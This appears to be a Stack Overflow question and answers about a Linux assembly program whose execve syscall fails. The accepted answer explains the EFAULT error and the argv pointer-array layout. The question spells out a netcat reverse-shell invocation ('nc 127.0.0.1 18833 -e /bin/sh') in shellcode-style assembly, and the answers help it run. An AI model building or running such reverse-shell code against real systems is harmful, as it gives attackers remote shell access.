# Linux Sys_execve wont run in assembly

Tags: linux, assembly, netcat

I am writing an assembly program which needs to make a call to netcat and execute a program over the internet.

As I understand it, for a execve command, you point the EBX register to the program you want to run with a null byte at the end to terminate. you point the ECX register to arguments separated by null bytes with 2 null bytes at the end of the list of args. you just set EDX to a bunch of null bytes.

at my command int0x80 to execute the command my registers look like this:

Eax : 11 #system call
EBX: 0x0783140 #/bin//nc
ECX: 0x078314a #args
EDX: 0x07831a4 #env

Here's the value of the memory at 0x0783140 in ascii:

[null byte] = 0x00

/bin//nc[null byte]127.0.0.1[null byte]18833[null byte]-e[null byte]/bin/sh[null byte][null byte]

EBX points to '/bin//nc'
ECX points to '127.0.0.1'
RDX just points to a bunch of null bytes

The program will get to the int 0x80 call, but it will immediately return and put 0xfffffff2 in the EAX register.

Any help would be great.

EDIT: thanks to ephemient I'm now able to actually run netcat, but somehow I think my args are not being read by the program correctly. I think this because netcat runs but immediately exits with exit code 1 and no connection is established to my listener.

ecx now points to this in memory(note i put spaces between addresses for readability, but they do not exist in my program):

```
0x78315e 0x783168 0x78316e 0x783171 0x00000000

0x78315e => 127.0.0.1[Null Byte]
0x783168 => 18833[Null Byte]
0x78316e => -e[Null Byte]
0x783171 => /root/myprogram[Null Byte]
```

I have quadruple checked that the addresses actually point to the askii values above

Answer (score 1, accepted):

You're getting `errno=EFAULT` (0xfffffff2 = -14, 14 = EFAULT), indicating that you're passing a bad address to the syscall.

`SYS_execve` takes 3 arguments, but the second and third are NULL-terminated arrays of pointers to arguments/environment strings, not a single string of nul-separated components. Interpreting the string as an array of pointers, means the first 4 bytes of the string are interpreted as the address of the first string, but it's not a valid address, hence EFAULT.

```
SYSCALL_DEFINE3(execve,
                const char __user *, filename,
                const char __user *const __user *, argv,
                const char __user *const __user *, envp)
```

Comment: thanks so much, that solved the problem of netcat not running, but now the args are not being read correctly. Any further help you can provide would be greatly appreciated

Comment: @HansDonkersloot It looks like you're missing argv[0]. This is often the filename of the binary. It should come before the rest of the arguments.